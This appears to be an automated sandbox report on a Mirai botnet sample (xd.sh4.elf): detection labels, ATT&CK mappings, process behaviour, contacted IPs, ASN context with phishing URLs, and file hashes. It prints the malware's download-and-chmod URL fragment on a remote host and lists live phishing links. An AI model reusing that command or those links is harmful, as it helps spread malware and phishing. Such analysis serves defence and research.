Source: xd.sh4.elf, 5414.1.00005555d5e4f000.00005555d5ed2000.rw-.sdmp, xd.sh4.elf, 5419.1.00005555d5e4f000.00005555d5ed2000.rw-.sdmp, xd.sh4.elf, 5421.1.00005555d5e4f000.00005555d5ed2000.rw-.sdmp, xd.sh4.elf, 5423.1.00005555d5e4f000.00005555d5ed2000.rw-.sdmp, xd.sh4.elf, 5425.1.00005555d5e4f000.00005555d5ed2000.rw-.sdmp, xd.sh4.elf, 5427.1.00005555d5e4f000.00005555d5ed2000.rw-.sdmp, xd.sh4.elf, 5430.1.00005555d5e4f000.00005555d5ed2000.rw-.sdmp | Binary or memory string: UU5!/etc/qemu-binfmt/sh4

Stealing of Sensitive Information

Source: Yara match | File source: xd.sh4.elf, type: SAMPLE
Source: Yara match | File source: 5430.1.00007f0bb0400000.00007f0bb0414000.r-x.sdmp, type: MEMORY
Source: Yara match | File source: 5423.1.00007f0bb0400000.00007f0bb0414000.r-x.sdmp, type: MEMORY
Source: Yara match | File source: 5421.1.00007f0bb0400000.00007f0bb0414000.r-x.sdmp, type: MEMORY
Source: Yara match | File source: 5419.1.00007f0bb0400000.00007f0bb0414000.r-x.sdmp, type: MEMORY
Source: Yara match | File source: 5427.1.00007f0bb0400000.00007f0bb0414000.r-x.sdmp, type: MEMORY
Source: Yara match | File source: 5414.1.00007f0bb0400000.00007f0bb0414000.r-x.sdmp, type: MEMORY
Source: Yara match | File source: 5425.1.00007f0bb0400000.00007f0bb0414000.r-x.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: xd.sh4.elf PID: 5414, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: xd.sh4.elf PID: 5419, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: xd.sh4.elf PID: 5421, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: xd.sh4.elf PID: 5423, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: xd.sh4.elf PID: 5425, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: xd.sh4.elf PID: 5427, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: xd.sh4.elf PID: 5430, type: MEMORYSTR

Remote Access Functionality

Source: Yara match | File source: xd.sh4.elf, type: SAMPLE
Source: Yara match | File source: 5430.1.00007f0bb0400000.00007f0bb0414000.r-x.sdmp, type: MEMORY
Source: Yara match | File source: 5423.1.00007f0bb0400000.00007f0bb0414000.r-x.sdmp, type: MEMORY
Source: Yara match | File source: 5421.1.00007f0bb0400000.00007f0bb0414000.r-x.sdmp, type: MEMORY
Source: Yara match | File source: 5419.1.00007f0bb0400000.00007f0bb0414000.r-x.sdmp, type: MEMORY
Source: Yara match | File source: 5427.1.00007f0bb0400000.00007f0bb0414000.r-x.sdmp, type: MEMORY
Source: Yara match | File source: 5414.1.00007f0bb0400000.00007f0bb0414000.r-x.sdmp, type: MEMORY
Source: Yara match | File source: 5425.1.00007f0bb0400000.00007f0bb0414000.r-x.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: xd.sh4.elf PID: 5414, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: xd.sh4.elf PID: 5419, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: xd.sh4.elf PID: 5421, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: xd.sh4.elf PID: 5423, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: xd.sh4.elf PID: 5425, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: xd.sh4.elf PID: 5427, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: xd.sh4.elf PID: 5430, type: MEMORYSTR
MITRE ATT&CK Matrix (one tactic per column; a leading number is the count of matched signatures for that technique, techniques without a number did not match)

Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
Gather Victim Identity Information | 1 Scripting | Valid Accounts | Windows Management Instrumentation | 1 Scripting | Path Interception | 1 File and Directory Permissions Modification | 1 OS Credential Dumping | 11 Security Software Discovery | Remote Services | Data from Local System | 1 Non-Standard Port | Exfiltration Over Other Network Medium | 1 Service Stop
Credentials | Domains | Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | 1 Disable or Modify Tools | LSASS Memory | 1 File and Directory Discovery | Remote Desktop Protocol | Data from Removable Media | Junk Data | Exfiltration Over Bluetooth | Network Denial of Service
Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | Logon Script (Windows) | 1 Indicator Removal | Security Account Manager | 1 System Information Discovery | SMB/Windows Admin Shares | Data from Network Shared Drive | Steganography | Automated Exfiltration | Data Encrypted for Impact
Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 1 File Deletion | NTDS | System Network Configuration Discovery | Distributed Component Object Model | Input Capture | Protocol Impersonation | Traffic Duplication | Data Destruction
No configs have been found

Behavior Graph (rendered interactively on the original page; only the text recovered from the graph is kept here)

Behavior Graph ID: 1654967 | Sample: xd.sh4.elf | Start date: 02/04/2025 | Architecture: LINUX | Score: 100
Network nodes: 90.242.7.190, port 23 (VodafoneGB, United Kingdom); 195.15.230.248, port 23 (VTX-NETWORKCH, Switzerland); 98 other IPs or domains
Signatures on the root node: Malicious sample detected (through community Yara rule); Antivirus / Scanner detection for submitted sample; Multi AV Scanner detection for submitted file; Yara detected Mirai
Process tree:
  xd.sh4.elf (started) -> three xd.sh4.elf children (started); one of them -> xd.sh4.elf (started) and 3 other processes. Signatures on the first child: Sample tries to kill multiple processes (SIGKILL); Sample deletes itself
  systemd -> gpu-manager (started) -> gpu-manager sh (three instances, started) and 5 other processes -> sh grep (six instances, started) and 2 other processes
  gvfsd-fuse -> fusermount (started). Signature: Sample reads /proc/mounts (often used for finding a writable filesystem)
  44 other processes, including generate-config -> pkill (started) and 40 other processes
Antivirus, Machine Learning and Genetic Malware Detection

Source | Detection | Scanner | Label
xd.sh4.elf | 63% | Virustotal |
xd.sh4.elf | 64% | ReversingLabs | Linux.Trojan.Mirai
xd.sh4.elf | 100% | Avira | LINUX/Mirai.bonb
No Antivirus matches
No Antivirus matches

Source | Detection | Scanner | Label
http://213.209.129.92/d/xd.arm7;chmod | 0% | Avira URL Cloud | safe

No contacted domains info

Name | Source | Malicious | Antivirus Detection | Reputation
http://213.209.129.92/d/xd.arm7;chmod | xd.sh4.elf | false | Avira URL Cloud: safe | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
18.23.138.219 | unknown | United States | 3 | MIT-GATEWAYSUS | false
1.131.92.134 | unknown | Australia | 1221 | ASN-TELSTRATelstraCorporationLtdAU | false
9.140.25.126 | unknown | United States | 3356 | LEVEL3US | false
203.142.155.151 | unknown | Australia | 9443 | VOCUS-RETAIL-AUVocusRetailAU | false
76.36.89.203 | unknown | United States | 18494 | CENTURYLINK-LEGACY-EMBARQ-WRBGUS | false
71.117.0.55 | unknown | United States | 701 | UUNETUS | false
191.46.129.2 | unknown | Brazil | 7738 | TelemarNorteLesteSABR | false
35.224.125.126 | unknown | United States | 15169 | GOOGLEUS | false
211.212.76.94 | unknown | Korea Republic of | 9318 | SKB-ASSKBroadbandCoLtdKR | false
141.163.163.151 | unknown | United Kingdom | 786 | JANETJiscServicesLimitedGB | false
253.249.54.108 | unknown | Reserved | unknown | unknown | false
157.230.181.161 | unknown | United States | 14061 | DIGITALOCEAN-ASNUS | false
107.64.221.118 | unknown | United States | 7018 | ATT-INTERNET4US | false
148.127.109.169 | unknown | United States | 18819 | ENTERGY-CORP-US | false
223.51.198.111 | unknown | Korea Republic of | 9644 | SKTELECOM-NET-ASSKTelecomKR | false
193.185.140.67 | unknown | Finland | 719 | ELISA-ASHelsinkiFinlandEU | false
98.91.152.18 | unknown | United States | 11351 | TWC-11351-NORTHEASTUS | false
91.26.168.171 | unknown | Germany | 3320 | DTAGInternetserviceprovideroperationsDE | false
113.68.200.52 | unknown | China | 4134 | CHINANET-BACKBONENo31Jin-rongStreetCN | false
254.24.37.146 | unknown | Reserved | unknown | unknown | false
152.39.57.159 | unknown | United States | 81 | NCRENUS | false
248.78.199.92 | unknown | Reserved | unknown | unknown | false
222.108.206.164 | unknown | Korea Republic of | 4766 | KIXS-AS-KRKoreaTelecomKR | false
240.50.47.31 | unknown | Reserved | unknown | unknown | false
178.183.191.180 | unknown | Poland | 5588 | GTSCEGTSCentralEuropeAntelGermanyCZ | false
188.59.192.117 | unknown | Turkey | 16135 | TURKCELL-ASTurkcellASTR | false
103.238.148.44 | unknown | Malaysia | 45595 | PKTELECOM-AS-PKPakistanTelecomCompanyLimitedPK | false
203.207.159.169 | unknown | China | 17964 | DXTNETBeijingDian-Xin-TongNetworkTechnologiesCoLtd | false
206.95.116.52 | unknown | United States | 3549 | LVLT-3549US | false
123.64.13.116 | unknown | China | 9394 | CTTNETChinaTieTongTelecommunicationsCorporationCN | false
156.194.25.68 | unknown | Egypt | 8452 | TE-ASTE-ASEG | false
82.108.164.163 | unknown | United Kingdom | 4589 | EASYNETEasynetGlobalServicesEU | false
136.104.164.124 | unknown | United States | 60311 | ONEFMCH | false
128.4.151.94 | unknown | United States | 2 | UDEL-DCNUS | false
175.74.49.93 | unknown | China | 9394 | CTTNETChinaTieTongTelecommunicationsCorporationCN | false
84.245.129.125 | unknown | Germany | 20676 | PLUSNETDE | false
71.248.210.125 | unknown | United States | 701 | UUNETUS | false
90.242.7.190 | unknown | United Kingdom | 5378 | VodafoneGB | false
149.228.162.41 | unknown | Germany | 702 | UUNETUS | false
255.162.237.222 | unknown | Reserved | unknown | unknown | false
195.55.88.62 | unknown | Spain | 3352 | TELEFONICA_DE_ESPANAES | false
19.209.19.163 | unknown | United States | 3 | MIT-GATEWAYSUS | false
172.246.152.35 | unknown | United States | 18978 | ENZUINC-US | false
161.153.127.76 | unknown | United States | 9328 | DATACOM-AUDATACOMSYSTEMSAUPTYLTDAU | false
120.204.67.235 | unknown | China | 24400 | CMNET-V4SHANGHAI-AS-APShanghaiMobileCommunicationsCoLt | false
165.17.51.26 | unknown | unknown | 37284 | Aljeel-netLY | false
57.94.92.1 | unknown | Belgium | 51964 | ORANGE-BUSINESS-SERVICES-IPSN-ASNFR | false
199.55.214.174 | unknown | United States | 398192 | ARDOT-NET-01US | false
9.73.33.143 | unknown | United States | 3356 | LEVEL3US | false
152.177.102.169 | unknown | United States | 701 | UUNETUS | false
5.167.247.165 | unknown | Russian Federation | 51604 | EKAT-ASRU | false
219.78.245.146 | unknown | Hong Kong | 4760 | HKTIMS-APHKTLimitedHK | false
251.155.56.22 | unknown | Reserved | unknown | unknown | false
182.226.239.207 | unknown | Korea Republic of | 17858 | POWERVIS-AS-KRLGPOWERCOMMKR | false
19.196.15.45 | unknown | United States | 3 | MIT-GATEWAYSUS | false
211.68.251.108 | unknown | China | 4538 | ERX-CERNET-BKBChinaEducationandResearchNetworkCenter | false
217.172.131.73 | unknown | United Kingdom | 33854 | HOSTIT-AS-NNGB | false
5.124.236.196 | unknown | Iran (ISLAMIC Republic Of) | 44244 | IRANCELL-ASIR | false
105.85.237.206 | unknown | Egypt | 36992 | ETISALAT-MISREG | false
125.213.204.39 | unknown | Afghanistan | 17411 | IO-GLOBAL-APIoGlobalServicesPvtLimitedAF | false
162.1.112.64 | unknown | United States | 27353 | IUHEALTH-ASNUS | false
183.157.118.198 | unknown | China | 4134 | CHINANET-BACKBONENo31Jin-rongStreetCN | false
61.103.199.165 | unknown | Korea Republic of | 9457 | DREAMX-ASDREAMLINECOKR | false
86.126.217.138 | unknown | Romania | 8708 | RCS-RDS73-75DrStaicoviciRO | false
              171.47.160.33
              unknownChina
              4134CHINANET-BACKBONENo31Jin-rongStreetCNfalse
              19.210.11.41
              unknownUnited States
              3MIT-GATEWAYSUSfalse
              46.97.23.38
              unknownRomania
              12302VODAFONE_ROCharlesdeGaullenr15ROfalse
              63.124.114.177
              unknownUnited States
              701UUNETUSfalse
              174.37.177.44
              unknownUnited States
              36351SOFTLAYERUSfalse
              116.212.11.48
              unknownKorea Republic of
              45361JCN-AS-KRUlsanJung-AngBroadcastingNetworkKRfalse
              40.24.14.62
              unknownUnited States
              4249LILLY-ASUSfalse
              173.93.73.222
              unknownUnited States
              11426TWC-11426-CAROLINASUSfalse
              254.129.63.29
              unknownReserved
              unknownunknownfalse
              195.15.230.248
              unknownSwitzerland
              12350VTX-NETWORKCHfalse
              118.59.160.166
              unknownKorea Republic of
              4766KIXS-AS-KRKoreaTelecomKRfalse
              79.176.182.81
              unknownIsrael
              8551BEZEQ-INTERNATIONAL-ASBezeqintInternetBackboneILfalse
              105.132.203.33
              unknownMorocco
              6713IAM-ASMAfalse
              213.209.129.92
              unknownGermany
              42821RAPIDNET-DEHaunstetterStr19DEfalse
              19.57.167.43
              unknownUnited States
              3MIT-GATEWAYSUSfalse
              9.7.255.81
              unknownUnited States
              3356LEVEL3USfalse
              211.153.203.5
              unknownChina
              4847CNIX-APChinaNetworksInter-ExchangeCNfalse
              178.177.6.54
              unknownRussian Federation
              25159SONICDUO-ASRUfalse
              98.134.53.71
              unknownUnited States
              8473BAHNHOFhttpwwwbahnhofnetSEfalse
              44.233.241.155
              unknownUnited States
              16509AMAZON-02USfalse
              188.179.236.76
              unknownDenmark
              3292TDCTDCASDKfalse
              192.143.250.212
              unknownSouth Africa
              37611AfrihostZAfalse
              107.226.200.178
              unknownUnited States
              7018ATT-INTERNET4USfalse
              81.46.48.249
              unknownSpain
              3352TELEFONICA_DE_ESPANAESfalse
              172.143.133.21
              unknownUnited States
              7018ATT-INTERNET4USfalse
              40.96.18.177
              unknownUnited States
              8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
              189.36.212.25
              unknownBrazil
              28296AcessaTelecomunicacoesLtdaBRfalse
              85.53.45.253
              unknownSpain
              12479UNI2-ASESfalse
              70.182.246.7
              unknownUnited States
              22773ASN-CXA-ALL-CCI-22773-RDCUSfalse
              208.198.22.217
              unknownUnited States
              1699ANS-1699-ASUSfalse
              205.228.153.136
              unknownUnited States
              5049MORGAN-ASNUSfalse
              135.6.73.133
              unknownUnited States
              10455LUCENT-CIOUSfalse
              117.135.21.34
              unknownChina
              24400CMNET-V4SHANGHAI-AS-APShanghaiMobileCommunicationsCoLtfalse
              82.100.126.238
              unknownSweden
              13189LIDEROLideroNetworkSEfalse
              126.184.106.140
              unknownJapan17676GIGAINFRASoftbankBBCorpJPfalse
              123.4.226.190
              unknownChina
              4837CHINA169-BACKBONECHINAUNICOMChina169BackboneCNfalse
              No context
              No context
Match (ASN) | Associated Sample Name / URL | Detection | Threat Name | Context (IP)
VOCUS-RETAIL-AU Vocus Retail AU
  arm5.elf | malicious | Unknown | 139.221.223.92
  resgod.arm.elf | malicious | Mirai | 104.100.148.228
  i686.elf | malicious | Mirai | 139.218.117.180
  hoho.i686.elf | malicious | Unknown | 122.149.110.193
  jkse.arm5.elf | malicious | Unknown | 211.27.75.71
  jkse.x86.elf | malicious | Unknown | 211.27.124.31
  splarm5.elf | malicious | Unknown | 116.245.153.230
  nklarm5.elf | malicious | Unknown | 112.213.162.115
  jklppc.elf | malicious | Unknown | 116.244.6.162
  nklx86.elf | malicious | Unknown | 111.220.116.144
MIT-GATEWAYS US
  https://supplier.metaenterprise.com/supplier-connect/home | malicious | Unknown | 18.117.34.67
  Advance-auto_receipt019.svg | malicious | HTMLPhisher, Invisible JS, Tycoon2FA | 18.164.124.96
  https://sprayfoamsys.com | malicious | Unknown | 18.164.96.87
  https://u7990385.ct.sendgrid.net/ls/click?upn=u001.oZ6GXC16Ztdw1ob-2F3C5yow-2FsK2YC4S8s269h9OLgp-2FGcQesCtXDXKgCEAF90Sa3OCy4-2F8kjpNgZm-2BgZsMdS1bfz52FcnP1TWB9R0E7-2F8Qnsc-2FB1JorLOHf8hisusJ4QRFAdkzlPlCtQyWV7XFlsorDlGs-2FXFaZtfILNk2CGzhOAh-2FplOBpAwbo8FEcNO6XU5yHNlcED7s9R6vn8NXl8BHGMXjZTaDIh3ednS0qpEYQlkjgdh04lqNlwUYQgfcZcrKvrl_TS1MykV2MfY4erwoSL54Fxruz3oW8XjCJ-2BoN9Zik9lnfuVgJcpfWzpZ2kemqNfDwpv0iQt9S4uySN3znm-2BVhjBDFXpavPbhp3p63OqMKE14K-2B87bgvIyQeft2IA5x5DXtXyea4x7LL3ebnAt5F3iws4moF4GGYx8i-2BOXu7XZjWH0GMPc0EM6lkOWGk0vwG-2FjwXFvt1n9jGbqE-2FkvlQWBREfPj3XI47wSs0OcIXHID47RBGllKyjoFHcTRVuRkeBPBjN4gewg0w8p4bShL-2Fr1YdURDfyviYbMM74eBBFCl2-2Bkr7ZOyuk-2FIHWpgRPOs9m54a1Lfkrfus2zBhCAWlGWoQpBcv6cXnG2svD8IGNmOfy9bqAH2OADQRmihLcQD9oUk5O-2BoVDui4816AM-2FXopyV9cYB0wzX6vtrT4EnW7jL7NESjGPrz7mdcXhfoIZCp4eInnzYxTQ8j8yFsGJ9bUK-2B8vuDffEncAbiSfBMicEq9uiA4Wk3TCDg6UfJl1sr76JQ2RYA4z5fFVT25Euw-2FCbwhWuVAyKUdFPY93NzmJl7ZYlNDPVrAclSb75dsk0rqhTu3ZTtC2bZEtzEALRsZQY4b221BytJlaaeRyyvP75v6ZmCcG7-2Bcl4WZGtsiW4-2FkDth6QE24hsfcLoAtA7pxT9uq-2BmqXz2quvSyk9-2Bm90ngMUEFVmzqJ2woki8fUYvKvsXhpNbl4YAk-2FjCY1SojpHp0OB5Ag9NAjiZCUsHiuxPmqFxotpjfwqx9h-2FIdr9skeRgttV-2FHbMYXeQfXe3eEepIS3L8j4eq-2FvVf5UOGVfefW9MIJOvr9g-2F-2F-2F1x8AnFuX1sjI30oQ-2BqYxjqJrVL0mKpiwZdEJzkC9CnhOyGpYXHtCUMTxDReigPu4J7-2B1wU5hRs85XHg597OD3ghdHNIq2Gd-2BKTtGqA99VnR9kFt3j98yvakP93-2Fxhk-2FLX4oMZzWfEjWvyJEpL17yKlwhsowtC9wvtyctQ09OLV1taCdtJx4wgtsp9tsqzNnyHObFTFv3zLF | malicious | Unknown | 18.173.132.94
  -Lysisfinancial_Executives_Schedule 6cLKF4B .svg | malicious | HTMLPhisher | 18.164.116.117
  http://daugavpils.pilseta24.lv/linkredirect/?link=https%3A%2F%2Fmujicconstruction.com%2Fjustdoitforyou%2F123%2FbGF1cmEuYmVyZ21hbkBwb3N0bm9yZC5jb20=&referer=daugavpils.pilseta24.lv%2Fzina%3Fslug%3Deccal-briketes-un-apkures-granulas-ar-lielisku-kvalitati-pievilcigu-cenu-videi-draudzigs-un-izd-8c175fc171&additional_params=%7B%22company_orig_id%22%3A%22267661%22%2C%22object_country_id%22%3A%22lv%22%2C%22referer_layout_type%22%3A%22SR%22%2C%22bannerinfo%22%3A%22%7B%5C%22key%5C%22%3A%5C%22%5C%5C%5C%22Apbed%5C%5Cu012b%5C%5Cu0161anas+nams-krematorija%5C%5C%5C%22%2C+SIA%7C2020-09-11%7C2021-08-23%7Cdaugavpils+p24+lielais+baneris%7Chttps%3A%5C%5C%5C%2F%5C%5C%5C%2Fwww.krematorijariga.lv%5C%5C%5C%2F%7C%7Cupload%5C%5C%5C%2F267661%5C%5C%5C%2Fbaners%5C%5C%5C%2F1184_krematorija_980x90.gif%7Clva%7C267661%7C980%7C90%7C%7C0%7C0%7C%7C0%7C0%7C%5C%22%2C%5C%22doc_count%5C%22%3A1%2C%5C%22key0%5C%22%3A%5C%22%5C%5C%5C%22Apbed%5C%5Cu012b%5C%5Cu0161anas+nams-krematorija%5C%5C%5C%22%2C+SIA%5C%22%2C%5C%22key1%5C%22%3A%5C%222020-09-11%5C%22%2C%5C%22key2%5C%22%3A%5C%222021-08-23%5C%22%2C%5C%22key3%5C%22%3A%5C%22daugavpils+p24+lielais+baneris%5C%22%2C%5C%22key4%5C%22%3A%5C%22https%3A%5C%5C%5C%2F%5C%5C%5C%2Fwww.krematorijariga.lv%5C%5C%5C%2F%5C%22%2C%5C%22key5%5C%22%3A%5C%22%5C%22%2C%5C%22key6%5C%22%3A%5C%22upload%5C%5C%5C%2F267661%5C%5C%5C%2Fbaners%5C%5C%5C%2F1184_krematorija_980x90.gif%5C%22%2C%5C%22key7%5C%22%3A%5C%22lva%5C%22%2C%5C%22key8%5C%22%3A%5C%22267661%5C%22%2C%5C%22key9%5C%22%3A%5C%22980%5C%22%2C%5C%22key10%5C%22%3A%5C%2290%5C%22%2C%5C%22key11%5C%22%3A%5C%22%5C%22%2C%5C%22key12%5C%22%3A%5C%220%5C%22%2C%5C%22key13%5C%22%3A%5C%220%5C%22%2C%5C%22key14%5C%22%3A%5C%22%5C%22%2C%5C%22key15%5C%22%3A%5C%220%5C%22%2C%5C%22key16%5C%22%3A%5C%220%5C%22%2C%5C%22key17%5C%22%3A%5C%22%5C%22%7D%22%7D&control=494d2e7146aade77cb8a9ef0fd1fd133 | malicious | HTMLPhisher | 18.164.116.109
  https://bpc.ldpkkacq.es/MgZjXO/ | malicious | HTMLPhisher, Invisible JS, Tycoon2FA | 18.164.124.91
  https://app.capacities.io/home/63046a91-df50-4ebb-84ab-5f0bf1208f6f | malicious | HTMLPhisher, Invisible JS, Tycoon2FA | 18.164.124.11
  https://app.salesforceiq.com/r?target=614a51825fca485d60691526&t=AFwhZf0cvVSRkxL_ZnKrPopBohu0BY8RxIvIio7deEr8IYfLj7_CzJhp0DG7qixuIe9S9P0aHZw30z0m58R-sX4GIJ0lhUgHQXCwgykuzYKc_TIaxSP3Z0ObCXElS3mCv7bs1E4pjVUI&url=https://TyW5.ArcxticVision.ru/u3v4jfQ-4jfQ/$eatme@shiitehole.com | malicious | HTMLPhisher, Invisible JS, Tycoon2FA | 18.164.124.110
  utorrent_installer.exe | malicious | Unknown | 18.164.96.127
ASN-TELSTRA Telstra Corporation Ltd AU
  xd.mips.elf | malicious | Mirai | 60.226.249.216
  xd.powerpc-440fp.elf | malicious | Mirai | 1.120.235.183
  xd.arm.elf | malicious | Mirai | 138.217.158.110
  xd.spc.elf | malicious | Mirai | 120.153.228.47
  ppc.elf | malicious | Mirai | 121.214.55.176
  mips.elf | malicious | Unknown | 120.158.97.80
  m68k.elf | malicious | Unknown | 137.147.88.56
  arm7.elf | malicious | Mirai | 58.166.71.86
  spc.elf | malicious | Unknown | 110.149.15.81
  boatnet.x86_64.elf | malicious | Mirai | 121.211.158.148
LEVEL3 US
  utorrent_installer.exe | malicious | Unknown | 4.150.155.223
  xd.mips.elf | malicious | Mirai | 4.243.233.137
  xd.powerpc-440fp.elf | malicious | Mirai | 4.78.223.144
  xd.arm.elf | malicious | Mirai | 8.126.249.250
  xd.ppc.elf | malicious | Mirai | 9.204.255.240
  xd.x86.elf | malicious | Mirai | 4.225.26.173
  xd.arm7.elf | malicious | Mirai | 9.72.135.5
  xd.i686.elf | malicious | Mirai | 204.161.102.43
  xd.sh4.elf | malicious | Mirai | 9.255.204.216
  xd.spc.elf | malicious | Mirai | 4.246.180.98
              No context
              No context
              Process:/usr/bin/pulseaudio
              File Type:ASCII text
              Category:dropped
              Size (bytes):10
              Entropy (8bit):2.9219280948873623
              Encrypted:false
              SSDEEP:3:5bkPn:pkP
              MD5:FF001A15CE15CF062A3704CEA2991B5F
              SHA1:B06F6855F376C3245B82212AC73ADED55DFE5DEF
              SHA-256:C54830B41ECFA1B6FBDC30397188DDA86B7B200E62AEAC21AE694A6192DCC38A
              SHA-512:65EBF7C31F6F65713CE01B38A112E97D0AE64A6BD1DA40CE4C1B998F10CD3912EE1A48BB2B279B24493062118AAB3B8753742E2AF28E56A31A7AAB27DE80E7BF
              Malicious:false
              Reputation:moderate, very likely benign file
              Preview:auto_null.
              Process:/usr/bin/pulseaudio
              File Type:ASCII text
              Category:dropped
              Size (bytes):18
              Entropy (8bit):3.4613201402110088
              Encrypted:false
              SSDEEP:3:5bkrIZsXvn:pkckv
              MD5:28FE6435F34B3367707BB1C5D5F6B430
              SHA1:EB8FE2D16BD6BBCCE106C94E4D284543B2573CF6
              SHA-256:721A37C69E555799B41D308849E8F8125441883AB021B723FED90A9B744F36C0
              SHA-512:6B6AB7C0979629D0FEF6BE47C5C6BCC367EDD0AAE3FC973F4DE2FD5F0A819C89E7656DB65D453B1B5398E54012B27EDFE02894AD87A7E0AF3A9C5F2EB24A9919
              Malicious:false
              Reputation:moderate, very likely benign file
              Preview:auto_null.monitor.
              Process:/usr/sbin/gdm3
              File Type:ASCII text
              Category:dropped
              Size (bytes):5
              Entropy (8bit):1.9219280948873623
              Encrypted:false
              SSDEEP:3:FTJ:pJ
              MD5:4B9EDCD22341DC5841FE35D9AF9FBFCD
              SHA1:B3D207B03F3BCBD22B804091508A87436CF78E75
              SHA-256:052D7B13CA45AB68E519E638363A53C402216FD7B7197EBB5330F6B3CB095C9E
              SHA-512:8DC2C15DBD211BA7C43E735BF65ABD1E76BF3666BF748373AB039BCA44F415BA311DF163513B8B0ED948EBE67AF7FC28B9267905867725E1E474AC75A56D3631
              Malicious:false
              Reputation:low
              Preview:5564.
              Process:/usr/bin/pulseaudio
              File Type:ASCII text
              Category:dropped
              Size (bytes):5
              Entropy (8bit):1.9219280948873623
              Encrypted:false
              SSDEEP:3:FWJ:a
              MD5:395BDAB1FC170F96F672C88702BECDEA
              SHA1:128FCC0C1B3F505A98B2C8AA132339F8876306CB
              SHA-256:B44E28E841A10AACF47A89058990C3903E52A000316740F965F486EC6867CC84
              SHA-512:5B80C2E6058C5BC393A3E3C1D52A55D0A49394BE530419872D3E7058000EDDBED05C297FEBD1AAA92AC35D5E16FE0E726EF672FB675419BE716221B31F6C58BF
              Malicious:false
              Reputation:low
              Preview:5534.
              Process:/usr/bin/gpu-manager
              File Type:ASCII text
              Category:dropped
              Size (bytes):25
              Entropy (8bit):2.7550849518197795
              Encrypted:false
              SSDEEP:3:JoT/V9fDVbn:M/V3n
              MD5:078760523943E160756979906B85FB5E
              SHA1:0962643266F4C5537F7D125046F28F21D6DD0C89
              SHA-256:048416AC7A9A99690B8B53718CD39F32F637B55CC8DD8E67E58E5AEF060DD41C
              SHA-512:DEFAAE8F8B54C61A716A0B0B4884358FEB8EB44DFEA01AAA5A687FDA7182792B7DEBB34AA840672EB3B40EB59FD0186749E08E47D181786C7FAA8C8F73F0104D
              Malicious:false
              Reputation:moderate, very likely benign file
              Preview:15ad:0405;0000:00:0f:0;1.
              Process:/usr/bin/gpu-manager
              File Type:ASCII text
              Category:dropped
              Size (bytes):1371
              Entropy (8bit):4.8296848499188485
              Encrypted:false
              SSDEEP:24:wPXXX9uV6BNu3WDF3GF3XFFxFFed2uk2HUvJlfWkpPpx7uvvAdow9555cJz:wPXXXe6vejpeC2HUR5WkpPpcvAdow95O
              MD5:3AF77E630DA00B3BE24F4E8AA5D78B13
              SHA1:BCF2D99E002F6DE2413A183227B011CFBEF5673D
              SHA-256:EB1CBBA20845237B4409274D693FEAE13F835274DA3337B7A9D14F4D7FDF9DEA
              SHA-512:8524B1E8A761F962B32F396812099B9B0B2DCF3C9FCA8605424753CFCFF4DC67EDC5EE1D8C91B9C0ED7FAE6BB1E752898B8D514B7C421D1839D6FEDA609C593C
              Malicious:false
              Reputation:moderate, very likely benign file
              Preview:log_file: /var/log/gpu-manager.log.last_boot_file: /var/lib/ubuntu-drivers-common/last_gfx_boot.new_boot_file: /var/lib/ubuntu-drivers-common/last_gfx_boot.can't access /run/u-d-c-nvidia-was-loaded file.can't get module info via kmodcan't access /opt/amdgpu-pro/bin/amdgpu-pro-px.Looking for nvidia modules in /lib/modules/5.4.0-72-generic/kernel.Looking for nvidia modules in /lib/modules/5.4.0-72-generic/updates/dkms.Looking for amdgpu modules in /lib/modules/5.4.0-72-generic/kernel.Looking for amdgpu modules in /lib/modules/5.4.0-72-generic/updates/dkms.Is nvidia loaded? no.Was nvidia unloaded? no.Is nvidia blacklisted? no.Is intel loaded? no.Is radeon loaded? no.Is radeon blacklisted? no.Is amdgpu loaded? no.Is amdgpu blacklisted? no.Is amdgpu versioned? no.Is amdgpu pro stack? no.Is nouveau loaded? no.Is nouveau blacklisted? no.Is nvidia kernel module available? no.Is amdgpu kernel module available? no.Vendor/Device Id: 15ad:405.BusID "PCI:0@0:15:0".Is boot vga? yes.Error: can't acce
              File type:ELF 32-bit LSB executable, Renesas SH, version 1 (SYSV), statically linked, stripped
              Entropy (8bit):6.777625438824355
              TrID:
              • ELF Executable and Linkable format (generic) (4004/1) 100.00%
              File name:xd.sh4.elf
              File size:83'248 bytes
              MD5:36584cff9e8b6f567ccbec876174ed0e
              SHA1:a1527c38535889a395d57101ce8e6731099ae9fa
              SHA256:4cba27a0b9f0fa526fad50047b72767853b55ad5bda6636469046486835bd9bc
              SHA512:4bdef0384a810ef1b821655949e51906105600433597bc8e545a0f1ed94d0c330c295b1172f609188f700619d88cd63abb36dc6656d289d14c843689ad8ed4c4
              SSDEEP:1536:S/awroKM0wtC0BYvzL3GgSPGkXv9fs3IYuSyGKKOX+S0upFC69uxAdyQ:SCwnl0KP38GkVf+bw6OYupFoAsQ
              TLSH:3B83BE72D0A8AE68C682467475D8DD3A9F2391C412973EF6A6D0C76A6443EEDF404FF0
              File Content Preview:.ELF..............*.......@.4....C......4. ...(...............@...@..8...8...............@...@B..@B.`...t(..........Q.td............................././"O.n........#.*@........#.*@.....o&O.n...l..............................././.../.a"O.!...n...a.b("...q.

              ELF header

              Class:ELF32
              Data:2's complement, little endian
              Version:1 (current)
Machine:<unknown> (the report's ELF parser has no name for this e_machine value; the file type above identifies it as Renesas SH, and the header bytes in the File Content Preview show 0x2A = 42 = EM_SH at offset 18)
              Version Number:0x1
